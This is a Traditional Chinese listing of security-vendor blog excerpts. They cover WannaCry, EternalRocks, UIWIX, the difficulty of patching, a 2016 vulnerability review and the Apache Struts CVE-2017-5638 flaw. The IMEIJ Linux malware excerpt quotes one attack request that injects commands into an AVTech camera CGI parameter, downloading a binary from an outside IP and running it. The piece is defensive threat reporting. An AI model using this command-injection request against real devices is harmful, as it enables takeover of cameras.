與 WannaCry 較勁?!「EternalRocks」一口氣用同個駭客集團外流的七個漏洞展開攻擊

一個名為「EternalRocks」的最新惡意程式,不僅會攻擊 ShadowBrokers 駭客集團從美國國安局 (NSA) 外流並被惡名昭彰的 WannaCry(想哭)勒索病毒/勒索蠕蟲所利用的 EternalBlue 和 DoublePulsar 兩個漏洞,還會攻擊其他五個由同一駭客集團所外流的漏洞:EternalChampion、EternalRomance、EternalSynergy、ArchiTouch以及SMBTouch。這些都是針對 Microsoft Server Message Block (SMB) 網路資源 (如檔案及印表機) 分享通訊協定的漏洞。

建議企業或個人使用者都該盡速更新修補自己的系統,即刻未雨綢繆,防患未然!

感染目標裝置後,會分兩階段執行安裝程序

EternalRocks 惡意程式最早是由科羅埃西亞電腦緊急應變小組 (CERT) 資安研究員 Miroslav Stampar 所發現,該惡意程式在感染目標裝置後,會分兩階段執行安裝程序。在第一階段,惡意程式會下載 TOR 用戶端 來建立通訊管道,接著再透過該管道與其幕後操縱 (C&C) 伺服器通訊。令人意外的是,該 C&C 伺服器並不會立即做出回應,而是等過了 24 小時之後才回應。這樣的延遲設計,很可能是為了躲避沙盒模擬分析技巧的測試以及資安人員的分析。 Continue reading “與 WannaCry 較勁?!「EternalRocks」一口氣用同個駭客集團外流的七個漏洞展開攻擊”

WannaCry 勒索病毒尚未平息,利用相同漏洞攻擊的 UIWIX 接踵而來

 WannaCry 哭聲未止,其他網路犯罪集團紛紛利用相同的漏洞來攻擊

一波未平一波又起,上周末WannaCry(想哭)勒索病毒/勒索蠕蟲剛爆發,另一隻也是利用 Server Message Block (SMB) 漏洞的UIWIX勒索病毒緊接著發動網路攻擊,除了 UIWIX 勒索病毒 (趨勢科技命名為 RANSOM_UIWIX.A) 還有另一個專門開採墨內羅 (Monero) 貨幣的木馬程式。

UIWIX 並非 WannaCry,但更難偵測

最近有些新聞報導表示 UIWIX 是 WannaCry 新演化的版本,但根據我們持續不斷的分析發現,這是一個全新的勒索病毒 Ransomware (勒索軟體/綁架病毒)家族,只不過和 WannaCry 一樣是利用 Server Message Block (SMB) 漏洞 (MS17-010,代號 EternalBlue,由 Shadow Brokers 所公開揭露) 來感染系統並在網路內散布,同時還會掃瞄網際網路上的電腦以尋找更多受害者。

UIWIX 有何不同?首先,它是所謂的無檔案型態病毒,UIWIX 是經由 EternalBlue 漏洞直接進入記憶體中執行。無檔案的感染方式不會在電腦硬碟寫入檔案或元件,因此不會留下什麼痕跡,所以更難偵測。

此外,UIWIX 的行為更加謹慎,只要它偵測到虛擬機器 (VM) 或沙盒模擬環境存在,就會自行終止。根據 UIWIX 程式內的字串顯示,它似乎可以蒐集感染系統上所儲存的瀏覽器、FTP、電子郵件以及即時通訊軟體帳號登入資訊。

以下是 WannaCry 和 UIWIX 主要特點: Continue reading “WannaCry 勒索病毒尚未平息,利用相同漏洞攻擊的 UIWIX 接踵而來”

< WannaCry 勒索病毒 > 60 天前已修正的問題,怎麼還會肆虐全球呢?-「為何不修補就好?」事情沒您想像的簡單!

WannaCry(想哭)勒索病毒/勒索蠕蟲」所利用的漏洞,是美國國安局 (NSA) 遭到外流的某項工具所攻擊的漏洞,同樣情況的還有另一個叫做「EwokFrenzy」的漏洞。EwokFrenzy 在 ZDI 資料庫中登記的漏洞編號為 ZDI-07-011,這是 10 年前的事了。難道這意味著該漏洞在廠商已經修正 10 年之後還有效嗎?看起來似乎如此。而這也是我們 20 多年來一直呼籲大家定期修補系統並做好備份的重要原因。

Zero Day Initiative (ZDI) 漏洞懸賞計畫機構對於修補漏洞的看法或許和大多數人不同。通常,我們會收到研究人員的第一手通報,然後我們會在內部驗證漏洞是否為真。接著,我們會通報給廠商。最後,當廠商釋出修補更新之後,我們會發布漏洞的一些詳細資訊。這些修補更新就是防範網路攻擊最好的方法。但最近,一個 Microsoft 在 2017 年 3 月即已修正的漏洞被一個叫做「Wanna」、「WannaCry(想哭)勒索病毒/勒索蠕蟲」或「Wcry」的勒索病毒所攻擊,使得全球都傳出災情。

怎麼會有 60 天前就已修正的問題會在全球造成這麼大的災情呢?人們為什麼不安裝修補更新呢?有時候,修補工作並不如您想像的容易,尤其對大型企業。

第一步:前置工作 

要建立一套完整的修補作業,企業首先必須掌握自己所有的資產。而這項工作聽起來容易,做起來卻相當困難。企業可選擇採用開放原始碼軟體或商用軟體工具來搜尋並登記其網路上的所有系統和裝置。就算他們用的是免費軟體,安裝建置仍需耗費成本。一旦企業找出所有需要保護的資產,接下來他們必須建立一套明確的流程來更新這些裝置,並且留下清楚的記錄。此時不光只有工作站和伺服器必須更新,一些網路裝置 (如路由器和交換器) 也要保持更新。所以,企業必須決定:是否該採用一套自動化系統?或是由系統管理員逐一到每台裝置上進行更新?由於早期的安全更新通常需要重新開機,或者可能打斷業務流程,因此,何時套用更新就很重要。此外,留下修補的記錄可以確保企業整體修補版本的一致性。

第二步:掌握最新修補訊息 Continue reading “< WannaCry 勒索病毒 > 60 天前已修正的問題,怎麼還會肆虐全球呢?-「為何不修補就好?」事情沒您想像的簡單!”

「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很”想哭”嗎? 談WannaCry 勒索病毒和更新修補的現實問題

2017年至今被標記為重大的漏洞有637個而且還在增加中,這比2016年(共回報1057個)的速度更快,而且這些數字僅僅是用於遠端攻擊的漏洞!這些並不一定都會影響你的企業,但現實是你每個月都要面臨嚴重漏洞。

旁觀者的直覺反應是「為什麼他們沒有修補自己的系統?」就跟數位世界內的大多數問題一樣,這並沒有看上去那麼簡單。雖然責怪受害者很容易,但這波勒索活動真正凸顯出了防禦方所面臨的根本難處。

WannaCry攻擊活動使用的是已公開近 60天的已知漏洞。不幸的是,我們將會在未來,持續看到該漏洞被攻擊。

[編者按:關於趨勢科技產品與 WannaCry 相關的最新資訊,請參閱。]

作者:Mark Nunnikhoven(趨勢科技雲端研究副總)

2017年5月12日出現的 WannaCry勒索病毒被精心設計來充分利用今日大型企業所最常見的安全難題。從基本的網路釣魚開始,此變種利用最近的漏洞(CVE-2017-0144/MS17-010)在脆弱的內部網路散播,肆虐於大型組織。

來看看這則紐約時報的貼文,他們用我的資料作出一張很酷的動態地圖

– MalwareTech(@MalwareTechBlog)2017年5月13日

旁觀者的直覺反應是「為什麼他們沒有修補自己的系統?」就跟數位世界內的大多數問題一樣,這並沒有看上去那麼簡單。雖然責怪受害者很容易,但這波勒索活動真正凸顯出了防禦方所面臨的根本難處。

這並非最新的零時差漏洞,修補程式MS17-010在攻擊(或持續性攻擊)前59天就已經發布。今日安全社群所面臨的難題之一是如何在大量業務活動內有效的溝通網路安全。

 

馬上更新修補程式,不要再拖了 !

安全社群的共識是,更新修補是你的第一道防線。儘管如此,組織需要花上100天更久來部署修補程式的狀況並不少見。為什麼?原因很複雜。但大致可歸結到一個事實,就是IT對業務運作很重要。任何中斷都令人沮喪和代價高昂。

從使用者的角度來看,「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很想哭嗎?持續進行更新很累人也妨礙到了工作。更糟的是更新後無法預期應用程式會發生什麼事。

Continue reading “「設定更新已經完成25%,不要關閉你的電腦」急著下班時,看到這個很”想哭”嗎? 談WannaCry 勒索病毒和更新修補的現實問題”

【勒索病毒警訊 】解析WannaCry/Wcry “想哭”史上第一勒索蠕蟲,感染流程與預防方法

今日爆出一款名為「WannaCry/Wcry(想哭)」的勒索病毒正在肆虐全球,包括美國《CNN》和英國《鏡報》報導皆報導了該則消息。根據趨勢科技Smart Protection Suites 的反饋資料顯示,台灣也受到此威脅嚴重影響,英國,智利,日本印度和美國也都傳出災情。

報導指出英國的國家醫療保健服務(NHS)遭到攻擊,許多醫院手術被迫取消,西班牙的電信公司、電力公司及公用事業的天然氣公司,都受到影響。葡萄牙的電信公司、聯邦快遞(FedEx)等也都受WannaCry/Wcry 勒索病毒影響。台灣今天也傳出桃園一名高中生遭「WannaCry」勒索病毒軟體攻擊,該病毒顯示支援28種語言,該男點選中文後,畫面隨即出現勒索訊息。

在今年初出現了兩個獨立的資安風險:CVE-2017-0144是一個可以造成遠端程式碼執行的 SMB伺服器漏洞,已經在三月份修復,還有會透過Dropbox網址散播的新勒索病毒 Ransomware (勒索軟體/綁架病毒)家族 WannaCry/Wcry在四月下旬出現。這兩種威脅現在結合在一起,造成對全球使用者最嚴重的勒索病毒攻擊。

勒贖通知要求用比特幣支付300美元;此金額要求已經低於早期的攻擊。除了一開始出現在英國的攻擊外,其他國家也遭受到嚴重的影響。

趨勢科技將這波攻擊所用的病毒變種偵測為RANSOM_WANA.A和RANSOM_WCRY.I。趨勢科技XGen安全防護所提供的預測機器學習技術和其他相關勒索病毒防護功能已經能夠主動保護客戶免於此攻擊的威脅。

 

[相關閱讀:使用免費的趨勢科技機器學習評估工具來評估現有端點防護軟體的安全間隙。]

 

近來勒索病毒驚傳變種,透過更多新型手法勒索您的檔案並要求支付高額贖金換取解密金鑰!
PC-cillin 2017勒索剋星可防範 WannaCry/Wcry勒索病毒,保護珍貴檔案,防止電腦被綁架,快為您的電腦做好防護!

 

感染途徑

這波攻擊所用的漏洞(代號EternalBlue)是Shadow Brokers駭客集團據稱從美國國家安全局(NSA)外洩的漏洞之一。攻擊該漏洞之後可以將檔案送入受害系統,再將此檔案作為服務執行。接著再將真正的勒索病毒檔案送入受害系統,它會用.WNCRY副檔名來對檔案進行加密(也會送入另一個用來顯示勒贖通知的檔案)。被針對的副檔名共有166種,包括Microsoft Office、資料庫、壓縮檔、多媒體檔案和各種程式語言常用的副檔名。
Continue reading “【勒索病毒警訊 】解析WannaCry/Wcry “想哭”史上第一勒索蠕蟲,感染流程與預防方法”

微軟正式停止更新 Vista ,是時候升級了

網路威脅的數量跟複雜程度都在日漸增加,有勒索病毒 Ransomware (勒索軟體/綁架病毒)會將你最重要的資料鎖住,還有資料竊取惡意軟體跟零時差威脅等…,我們在網路上時刻都要保持小心警惕,但我們也需要軟體廠商所提供的協助。這也是為什麼保持最新的安全更新是件相當重要的事情。

4月11日微軟終止 Windows Vista 作業系統的支援。這對那些尚未升級到更新更安全版本的人來說,也意味著現在時候到了。

Windows Vista 發行以來的十年,網路犯罪已經發展成價值數十億美元的全球性黑色產業

我們都面對著可怕的網路敵人。從Windows Vista發行以來的十年之間,網路犯罪已經真正發展成價值數十億美元的全球性黑色產業。駭客有時從遙遠的國家來攻擊消費者和企業,受到網路匿名保護而逃避了法律制裁。 Continue reading “微軟正式停止更新 Vista ,是時候升級了”

《2016年漏洞回顧》漏洞攻擊套件為何仍使用較舊的漏洞?

我們經常會看到漏洞攻擊套件使用較舊的漏洞,因為這些漏洞仍然存在於被攻擊的系統上。另外,勒索病毒會去利用漏洞攻擊套件來作為主要的感染媒介。

趨勢科技2016年的資安綜合報告 – 「企業威脅創紀錄的一年」中,我們討論了這一年的漏洞發展形勢和所看到的趨勢。

讓我們來看看在2016年間發生的一些重點。

  1. 趨勢科技的零時差計畫(ZDI)在3,000多名獨立漏洞研究人員的支持下,披露了 678個漏洞。可以從下圖看出一些有意思的趨勢:

  • 首先是微軟產品的漏洞在持續減少中。這是個好消息,但對微軟來說不大好的消息是 Edge 漏洞增加了2,100%。這在 2017年的 Pwn2Own 大會中得到進一步的證明,因為 Edge 是競賽中被漏洞攻擊最多的瀏覽器。
  • 其次是整體 Adobe 的漏洞數量下降,不過 Acrobat Reader 在 2016 年被披露的漏洞最多。
  • 零時差攻擊(在修補程式發布前就有針對漏洞的攻擊出現)數量在 2016 年比 2015 年下降。這是個好消息,但我們最近也看到了美國中情局被駭事件,可能有許多零時差漏洞攻擊尚未被披露。
  • Android漏洞數量大幅地增加(206%)。趨勢科技研究人員在 2016 年向 Google 提交了 54 個安全漏洞。
  • 在2016年被披露的 SCADA(資料採集與監控系統)漏洞增加了421%,鑒於對這些設備進行更新的困難度,這對廠商來說會是件頭痛的事。

Continue reading “《2016年漏洞回顧》漏洞攻擊套件為何仍使用較舊的漏洞?”

趨勢科技慶祝 TippingPoint 併購一週年,完成包括團隊及技術整合的多項重大里程碑

【2017年3月16日,台北訊】今年三月,全球網路資安解決方案領導廠商趨勢科技 (東京證券交易所股票代碼:4704) 從 Hewlett Packard Enterprise 手中併購 TippingPoint 公司已屆滿一週年。在組織整合的第一年當中,趨勢科技不僅展現了無比的執行力與業務無縫接軌能力,更在產品創新方面發揚光大,讓新的 TippingPoint 交出比去年成長 25% 的業績,並進一步提升市場領導地位。趨勢科技 TippingPoint 最近更在 2017 年「Gartner 入侵防護系統神奇象限」報告當中榮獲「願景完整性」與「執行力」雙重領導者地位[1]。不僅如此,趨勢科技也在 2016 年 NSS Labs 新一代入侵防護系統 (NGIPS) 測試當中榮獲「推薦」的評價。

趨勢科技明瞭組織整合只許成功不許失敗,因此特別簽下了 300 多名原 TippingPoint 員工以確保 2,500 多家 TippingPoint 大型客戶的服務絕不出現斷層。今年三月,該團隊已順利遷進完善且擁有先進研發實驗室的德州奧斯汀新辦公室。

過去這一年,由於 TippingPoint 業務穩定的發展,使得趨勢科技得以延續其創新歷史。TippingPoint 產品不僅更上層樓,而且與趨勢科技原本的產品完美整合,更加鞏固趨勢團隊在企業網路資安市場的地位和名聲。例如,TippingPoint 的 NGIPS 已與趨勢科技 Deep Discovery 進階威脅防護技術整合,形成一套更強大的 Network Defense 網路防禦解決方案。今年一月,TippingPoint 率先成為第一家提供 100 Gbps 封包檢查吞吐量獨立式 NGIPS 解決方案的廠商,讓資料中心和企業網路能享有低延遲高效能的防護。今年二月,TippingPoint 更導入機器學習技術,成為第一家率先採用機器學習技術在透通模式 (in-line) 即時偵測及攔截攻擊的獨立式 NGIPS 廠商。過去 12 個月當中,趨勢科技申請了 16 項有關機器學習在資安情報應用領域的最新專利。

TippingPoint 的加入也帶來了領先業界的強大資安情報與漏洞研究能力,包括:Digital Vaccine® Labs (DVLabs) 數位疫苗實驗室與 Zero Day Initiative (ZDI) 漏洞懸賞計畫。ZDI 在過去一年當中妥善揭露了 678 漏洞,涵蓋 48 家廠商的產品,此外目前仍在處理當中漏洞的還有將近 400 個。趨勢科技因為能夠提早掌握這些尚未公開的漏洞,因而能夠預先為客戶提供零時差防護。

Continue reading “趨勢科技慶祝 TippingPoint 併購一週年,完成包括團隊及技術整合的多項重大里程碑”

攻擊 CGI 漏洞的新 Linux 惡意程式

 

長久以來,Linux 一直是企業平台與物聯網(IoT ,Internet of Thing)裝置製造商所偏愛的作業系統。許多不同產業都紛紛採用以 Linux 為基礎的裝置來建置智慧型系統,並利用物聯網 (IoT) 閘道來建立各種業務所需的連網解決方案及服務。然而隨著這類裝置不斷普及,針對 Linux 系統的資安威脅也跟著增加。先前在 2016 年我們即討論過一系列的 Linux 威脅,其中最知名的莫過於 Mirai 惡意程式 (趨勢科技命名為 ELF_MIRAI)。

最近又出現了一個新的 Linux ARM 惡意程式叫做 IMEIJ (趨勢科技命名為 ELF_IMEIJ.A)。此威脅專門攻擊 AVTech (陞泰科技) 監視攝影裝置的漏洞。此漏洞是由匈牙利的資安研究機構 Search-Lab 所發現,並且在 2016 年 10 月公開揭露。不過在此之前,Search-Lab 曾多次試圖聯絡 AVTech 卻未獲回應。

感染流程及類似惡意程式

此惡意程式是經由 CGI 指令感染。遠端駭客會隨機挑選一個 IP 位址然後向該位址發送以下網站指令來攻擊此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

更精確一點,它是利用 AVTech 裝置上的 CloudSetup.cgi 程式漏洞將惡意程式下載到裝置上,前述網站指令會讓裝置下載惡意檔案,並且將檔案設定成可執行檔。

圖 1:IMEIJ 的感染流程。 Continue reading “攻擊 CGI 漏洞的新 Linux 惡意程式”

CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式

 

Apache Struts 是一個免費的開放原始碼程式開發架構,用來開發 Java 網站應用程式。我們仔細研究了過去 Apache Struts 被發現的幾個遠端程式碼執行 (Remote Code Execution,簡稱 RCE) 漏洞之後發現,歹徒大多使用 Object Graph Navigation Language (OGNL) 這個程式語言。OGNL 之所以很容易讓駭客從遠端執行任意的程式碼,是因為 Apache Struts 在大多數的流程當中都用到這個語言。

最近,一位研究人員在 Apache Struts 2 當中新發現一個關於 OGNL 的遠端程式碼執行漏洞:CVE-2017-5638。此外,一份報告也指出網路上已出現實際的漏洞攻擊案例,我們的研究和監控團隊也見過利用該漏洞的攻擊。

攻擊手法

駭客可以發送一個精心設計的網站請求給含有漏洞的伺服器,就能將一個檔案上傳至使用 Jakarta 外掛模組來處理檔案上傳請求的伺服器。

駭客接著在 Content-Type 標頭當中包含所要執行的指令來讓受害的伺服器執行指令。網路上已經出現示範這項攻擊手法的概念驗證

漏洞分析

為了深入了解這項漏洞,我們仔細研究了一下該漏洞的修補程式,我們發現廠商在 FileUploadInterceptor.java 當中已放棄使用「LocalizedTextUtil」這個類別。此類別原本是用來在 HTTP 檔案上傳請求失敗時提供錯誤訊息給使用者。 Continue reading “CVE-2017-5638:Apache Struts 2 漏洞可能讓駭客從遠端執行程式”